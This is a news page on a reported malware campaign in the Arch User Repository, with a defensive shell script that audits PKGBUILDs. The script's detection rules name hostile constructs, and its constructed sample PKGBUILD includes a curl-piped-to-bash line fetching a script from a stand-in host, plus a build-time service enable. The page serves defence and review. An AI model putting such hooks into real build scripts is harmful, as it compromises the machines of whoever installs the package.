Hundreds of Malicious Packages with Rootkit Found in Arch Linux Repository

Quick answer
More than 400 packages carrying a rootkit and an infostealer have been found in the Arch User Repository (AUR); the malware targets Linux users' credentials and access tokens.
Security researchers have uncovered a large-scale campaign distributing malware through the Arch User Repository (AUR). The attackers planted a rootkit and an infostealer in more than 400 packages built to steal credentials and access tokens from Linux users. The people most exposed are those who routinely install software from sources outside the official repositories.
The attack succeeded because AUR has no gatekeeping comparable to the official repositories. Packages in the official repositories are built and signed by Arch maintainers; AUR entries are build scripts (PKGBUILDs) that any registered user can publish, and the script runs on the installing user's machine with whatever that script does. That makes it an easy channel for distributing malware.
The malicious packages were disguised as legitimate applications, which made them hard to spot. The infostealer harvested data from browsers, messengers and other applications, while the rootkit kept the malicious code hidden and running with root privileges. Experts advise users to verify package checksums and to run antivirus software on Linux. Checksum verification offers limited protection in this case, though: makepkg checks the downloaded sources against the sums listed in the PKGBUILD, and a malicious uploader writes both, so a matching checksum only confirms that you received what the uploader intended. The check that matters is reading the PKGBUILD, any .install script and the source= URLs before building.
Arch Linux developers have already removed the malicious packages from AUR, but a system that installed them stays compromised until it is cleaned up. Users should audit their installed packages (pacman -Qm lists those that did not come from the official repositories), rotate any credentials and access tokens that were stored on the affected machine, and, since the rootkit ran as root, consider reinstalling the system rather than trusting an in-place cleanup.
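The review step described above can be partly scripted. The following shell script is an added example written for this page; it is not the article's code and not Arch Linux tooling. It greps a PKGBUILD for constructs that should make you read the build script line by line (remote scripts piped into a shell, base64-decoded payloads, services enabled at build time, SKIP checksums) and compares every host referenced in the file with the host in the url= field, so a source=() entry fetched from somewhere other than upstream stands out. The rule list, the host-mismatch heuristic, the package names and the example.net/example.org hosts are all assumptions, and the two PKGBUILDs it audits are constructed samples, not real AUR packages.

```shell
#!/usr/bin/env bash
# Added example, not part of the article or of Arch Linux's own tooling.
# Heuristic pre-build review of an AUR PKGBUILD. makepkg only verifies that the
# fetched sources match the checksums written in the PKGBUILD, and a malicious
# uploader controls both, so the script itself has to be read before it runs.
# The rules and the host-mismatch heuristic are assumptions for illustration;
# the sample PKGBUILDs below are constructed, not real AUR packages.
set -u

# Print "line: finding: text" for every risky construct in the given PKGBUILD.
# Returns 0 when nothing was flagged, 1 otherwise.
audit_pkgbuild() {
  local file="$1" hits=0 name regex found n
  # One rule per line: a one-word name, then an extended regex without spaces.
  while read -r name regex; do
    [ -n "$name" ] || continue
    found=$(grep -nE "$regex" "$file" | sed "s|^\([0-9][0-9]*\):|\1: $name: |")
    if [ -n "$found" ]; then
      printf '%s\n' "$found"
      n=$(printf '%s\n' "$found" | grep -c .)
      hits=$((hits + n))
    fi
  done <<'EOF'
remote-script-piped-to-shell (curl|wget)[^|]*[|][[:space:]]*(ba|z)?sh
base64-decoded-payload base64[[:space:]]+(-d|--decode)
eval-of-constructed-command (^|[^[:alnum:]_])eval[[:space:]]
service-enabled-during-build systemctl[[:space:]]+(enable|start)
system-persistence-path /etc/(systemd|cron|ld\.so\.preload|modules-load|profile\.d)
setuid-bit-set chmod[[:space:]]+(u[+]s|[4-7][0-7]{3})
kernel-module-loaded (^|[[:space:]])(insmod|modprobe)[[:space:]]
ssh-key-material-touched \.ssh/
plain-http-source ^source=.*http://
checksum-verification-skipped ^(md5|sha[0-9]+|b2)sums=.*SKIP
EOF
  [ "$hits" -eq 0 ]
}

# Compare every host referenced in the PKGBUILD with the host of its url= field.
# Prints one line per foreign host; returns 1 if any were found or url= is missing.
check_source_hosts() {
  local file="$1" uphost host bad=0
  uphost=$(sed -nE "s#^url=[\"']?https?://([^/\"']+).*#\1#p" "$file" | head -n 1)
  if [ -z "$uphost" ]; then
    echo "no url= field to compare against"
    return 1
  fi
  for host in $(grep -oE "https?://[^/[:space:]\"')]+" "$file" | sed -E 's#^https?://##' | sort -u); do
    if [ "$host" != "$uphost" ]; then
      printf 'source host %s differs from upstream host %s\n' "$host" "$uphost"
      bad=1
    fi
  done
  return "$bad"
}

# Constructed samples with hypothetical package names; example.net/.org are reserved names.
SAMPLE_DIR=$(mktemp -d)
trap 'rm -rf "$SAMPLE_DIR"' EXIT
MALICIOUS="$SAMPLE_DIR/PKGBUILD.suspicious"
CLEAN="$SAMPLE_DIR/PKGBUILD.clean"

cat >"$MALICIOUS" <<'EOF'
pkgname=example-browser-bin
pkgver=1.2.3
url="https://example-browser.org"
source=("https://example-browser.org/releases/example-browser-1.2.3.tar.gz"
        "patch.sh::https://cdn.example.net/fixes/patch.sh")
sha256sums=('SKIP' 'SKIP')
package() {
  install -Dm755 example-browser "$pkgdir/usr/bin/example-browser"
  curl -s https://cdn.example.net/fixes/init.sh | bash
  echo 'ZWNobyBoaQo=' | base64 -d >/tmp/.cache.sh
  systemctl enable example-updater.service
}
EOF

cat >"$CLEAN" <<'EOF'
pkgname=example-tool
pkgver=0.4.1
url="https://example-tool.org"
source=("https://example-tool.org/releases/example-tool-0.4.1.tar.gz")
# placeholder checksum for the constructed sample
sha256sums=('0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef')
build() {
  cd "example-tool-$pkgver"
  make
}
package() {
  cd "example-tool-$pkgver"
  make DESTDIR="$pkgdir" install
}
EOF

for f in "$MALICIOUS" "$CLEAN"; do
  echo "== $f"
  if audit_pkgbuild "$f" && check_source_hosts "$f"; then
    echo "nothing flagged; still read the build() and package() bodies yourself"
  else
    echo "review before running makepkg"
  fi
done
```

Run it against the PKGBUILD of each package that `pacman -Qm` reports before rebuilding or updating it. A clean result is not a clearance: the heuristics catch common tricks, not a carefully written build function, and they say nothing about a binary tarball's contents.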
Common questions
- What happened in the Arch Linux repository?
- More than 400 packages in the Arch User Repository (AUR) were found to contain malware: a rootkit and an infostealer that steal user credentials and access tokens from Linux systems.
- Who is at risk?
- Anyone who installed one of the affected AUR packages. More broadly, users who build AUR packages without reading the PKGBUILD, or who install from other untrusted sources and ignore security warnings, are exposed to this kind of attack.
- How can I protect myself from such threats?
- Prefer the official repositories. When you do use AUR, read the PKGBUILD and any .install script and check that the source= URLs point at the real upstream before running makepkg; remember that the checksums in the PKGBUILD were written by the same uploader. Keep the system updated, avoid suspicious sources, and consider antivirus software as an additional layer.